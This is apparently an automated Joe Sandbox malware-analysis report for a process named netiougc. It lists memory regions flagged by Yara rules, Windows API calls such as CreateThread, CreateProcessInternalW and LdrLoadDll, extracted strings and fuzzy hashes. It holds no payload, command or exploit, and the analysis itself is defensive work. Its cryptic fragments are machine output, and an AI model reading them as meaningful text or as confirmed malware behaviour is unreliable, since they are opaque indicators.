                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 74c5c68cbbdfaeb670d81c8020d0f408c0f06879a1c712c736e84e21dd21bdd8
                            • Instruction ID: ea9b0324d9a223d101b08c30c15ec3847895437c2f2f9a1456dc1fab79729e47
                            • Opcode Fuzzy Hash: 74c5c68cbbdfaeb670d81c8020d0f408c0f06879a1c712c736e84e21dd21bdd8
                            • Instruction Fuzzy Hash: 50900231A0550802D100B1584514706101987D1301F66C412B0428568D87998A5575B2
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8408f822923f68e9683172d270777b0657abba9591bbbb9a1bf2560f77058b8c
                            • Instruction ID: bcc530e778164428f9d29272d61015dbea0aaca2ab7e2048d861ef254d19eebc
                            • Opcode Fuzzy Hash: 8408f822923f68e9683172d270777b0657abba9591bbbb9a1bf2560f77058b8c
                            • Instruction Fuzzy Hash: E490022164545502D150B15C44046164019A7E1301F56C022B0818594D865989597231

                            Control-flow Graph

                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03219725
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID: "*$#$$$*O$3E$4$5$6$8$C$I$KF$Kv$L$LL$R*$RC$T$Y$a$c$c%$d$hd$l$m$y(${$|$)$D$Y$b
                            • API String ID: 2422867632-1487839028
                            • Opcode ID: ba8a4dbb8a442425e938609ba433a12e6699c93372ad438634db41c428d99022
                            • Instruction ID: 751625b3c3b82245040658ea68b6354c9bebe0596308880f9a7c4028529bf21b
                            • Opcode Fuzzy Hash: ba8a4dbb8a442425e938609ba433a12e6699c93372ad438634db41c428d99022
                            • Instruction Fuzzy Hash: 7DC139B0905769CBFB60CF41C9997DEBAB0BB45308F5081D9D1582B281CBFA1AC9CF95

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(3e3-f82u,00000111,00000000,00000000), ref: 03220B77
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: 3e3-f82u$3e3-f82u
                            • API String ID: 1836367815-3570064524
                            • Opcode ID: c0c6280c28913a88c558e5d1049345c9087b2b28b57d7dc2852f384087dfd47d
                            • Instruction ID: 1a1c44642d2f187102d39aee8a0273532712f6af6955b7792deb48dcbcd51a1f
                            • Opcode Fuzzy Hash: c0c6280c28913a88c558e5d1049345c9087b2b28b57d7dc2852f384087dfd47d
                            • Instruction Fuzzy Hash: 6901C4B6D0025C7AEB10EBA18C81EEF7B7CDF41698F048064FA04BB100D6755E468BE1

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(3e3-f82u,00000111,00000000,00000000), ref: 03220B77
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: 3e3-f82u$3e3-f82u
                            • API String ID: 1836367815-3570064524
                            • Opcode ID: 97bed52d89612a046c3a76c337089d362d5a8a305542d7027ea3ca2165dd0553
                            • Instruction ID: 5396962406caefae2e54920fa20737a8222aa00425617d3d0669748d25f28673
                            • Opcode Fuzzy Hash: 97bed52d89612a046c3a76c337089d362d5a8a305542d7027ea3ca2165dd0553
                            • Instruction Fuzzy Hash: 4501E5B6D0025C7AEB11EBA48C81EEF7B3CDF41698F048064FA04BB100D1745E068BE1
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 03232D2B
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: cce403f1ef7ecd4909ac2166125a3abd383449046d663b78a512fce05cbc157f
                            • Instruction ID: 7d44eb42d772506de271eb9b2657f7587eb9e7ecee81521355fc60b1a56fd6cd
                            • Opcode Fuzzy Hash: cce403f1ef7ecd4909ac2166125a3abd383449046d663b78a512fce05cbc157f
                            • Instruction Fuzzy Hash: 31318BB5600705BBD714DF64C881FE7FBBCAB89704F048529EA59AB244D7B0B684CBA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %
                            • API String ID: 0-2567322570
                            • Opcode ID: 31435a2de6e9dcd5047e3490d85f2cb0b886ad7c4131b10d5f15071b1693a14e
                            • Instruction ID: 6a155023c6d9480beb744c2260b23adc1e56c1c4d7ccc7cb6c70c1457e00c75d
                            • Opcode Fuzzy Hash: 31435a2de6e9dcd5047e3490d85f2cb0b886ad7c4131b10d5f15071b1693a14e
                            • Instruction Fuzzy Hash: B421BEB1A24352FFCB11EF69DCCB6E5FFA8FB05311B5401A9E4408B406D77155A1CBA4
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0322ECE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            • Opcode ID: d0032d7c985f010d29c3d10ffc862fae05c393eee5d5759b712857dfc701e6d8
                            • Instruction ID: e2561c0a5531e5cc0c1fc7c8935be35fed767a4488a927d96609e709c0f1f631
                            • Opcode Fuzzy Hash: d0032d7c985f010d29c3d10ffc862fae05c393eee5d5759b712857dfc701e6d8
                            • Instruction Fuzzy Hash: CB4172B6A1060AAFCB10DFD8DC809EEB7B9FF88304B148559E505EB204D771EE45CBA0
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0322ECE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            • Opcode ID: 107479310989bd27814fd21d64a1c36b92a04000098039477319e4c58e909f32
                            • Instruction ID: e838e6cecc39d5ebb1729acda0944213edef741bff532c64e19f0bc2c1bb9638
                            • Opcode Fuzzy Hash: 107479310989bd27814fd21d64a1c36b92a04000098039477319e4c58e909f32
                            • Instruction Fuzzy Hash: 13312CB6A1060AAFDB00DFD8CC809EEB7B9BF88304B148559E515AB214D775EE458BA0
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03224552
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: ad6e33b8d4698c7c43c606e25c9bf4f40c21fa71ffe3f46a1f23721449fc8031
                            • Instruction ID: 2ddbb751675785b09c3c65643577a06b49ffa5f2b3dbbabaf97b5c15fbd209b0
                            • Opcode Fuzzy Hash: ad6e33b8d4698c7c43c606e25c9bf4f40c21fa71ffe3f46a1f23721449fc8031
                            • Instruction Fuzzy Hash: A3015EB9D1020EBBDF10EBA5DC45F9DB7789B14208F0441A5E9089B240FA71E798CB91
                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,03227DF3,00000010,?,?,?,00000044,?,00000010,03227DF3,?,?,?), ref: 03238543
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 9806351269be84981e4843302406ddd54db5c234d9d2f734d5c08ea05616d791
                            • Instruction ID: a11117a8d06ea2b03a8a2a2d54908ecc0f791e02e41afbcb57ff3bfff3aa75e3
                            • Opcode Fuzzy Hash: 9806351269be84981e4843302406ddd54db5c234d9d2f734d5c08ea05616d791
                            • Instruction Fuzzy Hash: 3701C4B2214208BBCB44DE89DC80EEB77EDEF8D714F408108BA0DE7240DA71F8518BA4
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03219725
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: e67f049cea204d0c1459009e71752161978d8b9e63de46b4c2550ca9955272de
                            • Instruction ID: ed19f141f2c5f3866e86fc5084573813ff7fcbb25529078b7fa05cc3a7ab5caa
                            • Opcode Fuzzy Hash: e67f049cea204d0c1459009e71752161978d8b9e63de46b4c2550ca9955272de
                            • Instruction Fuzzy Hash: 9AF039B73A031436E320A6E99C02FEBB39C8F91B61F140025F70CEA180D9A2B49142E9
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03219725
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 4cb594bfc38ee100ba69b7612f99811ba0ec49cd5375128f137a96ea7abc7136
                            • Instruction ID: d2e9620d9d5331bd2c3a115cf39de9b5265504106530a824dfcf80e804364f7b
                            • Opcode Fuzzy Hash: 4cb594bfc38ee100ba69b7612f99811ba0ec49cd5375128f137a96ea7abc7136
                            • Instruction Fuzzy Hash: DAF06DB729030437E330A699CC42FDBB79CCF96B61F250014F708AF1C0D9A2B89142E9
                            APIs
                            • RtlAllocateHeap.NTDLL(03221719,?,03234E53,03221719,03234797,03234E53,?,03221719,03234797,00001000,?,?,03239CCD), ref: 0323843F
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 8e739d84df725d30fdb527b24dd1d2b1529f58f19dbd7a5eecf565546dbdda6e
                            • Instruction ID: 33c11f9ddaf218ccff863f3caa84f702418bd30ff4ab218c82be61974a418818
                            • Opcode Fuzzy Hash: 8e739d84df725d30fdb527b24dd1d2b1529f58f19dbd7a5eecf565546dbdda6e
                            • Instruction Fuzzy Hash: 4AE06DB52003047BD610EE58DD41F9B37ACDFC9710F004418FA08A7241C770B8108BB4
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFEC4,00000007,00000000,00000004,00000000,03223DB5,000000F4,?,?,?,?,?), ref: 0323848C
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 45c5b3800b981f43542a4392730af974c9a10f132f0c51a56b02927ff5448233
                            • Instruction ID: 345ef0555baae72ffc8b4a4a497b8431663cee7572a94a5fb31d7c2435424dc3
                            • Opcode Fuzzy Hash: 45c5b3800b981f43542a4392730af974c9a10f132f0c51a56b02927ff5448233
                            • Instruction Fuzzy Hash: D4E06DB52102047FD610EE58DD45F9B33ACEFCA750F404008FA09AB281C6B0B8208AB5
                            APIs
                            • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 03227E5C
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,03221A00,03236EB7,03234797,?), ref: 03227C73
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906209996.00000000038C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 038C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_38c0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906209996.00000000038C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 038C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_38c0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                            • API String ID: 0-3558027158
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            Strings
                            • Execute=1, xrefs: 03A54713
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A54725
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A546FC
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A54787
                            • ExecuteOptions, xrefs: 03A546A0
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A54742
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A54655
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$[$]:%u
                            • API String ID: 48624451-2819853543
                            Strings
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A502E7
                            • RTL: Re-Waiting, xrefs: 03A5031E
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A502BD
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            Strings
                            • RTL: Re-Waiting, xrefs: 03A57BAC
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03A57B7F
                            • RTL: Resource at %p, xrefs: 03A57B8E
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A5728C
                            Strings
                            • RTL: Re-Waiting, xrefs: 03A572C1
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03A57294
                            • RTL: Resource at %p, xrefs: 03A572A3
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$]:%u
                            • API String ID: 48624451-3050659472
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906209996.00000000038C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 038C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_38c0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: .$9p|>$:0=($;&5,$p|89
                            • API String ID: 0-2361401990
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280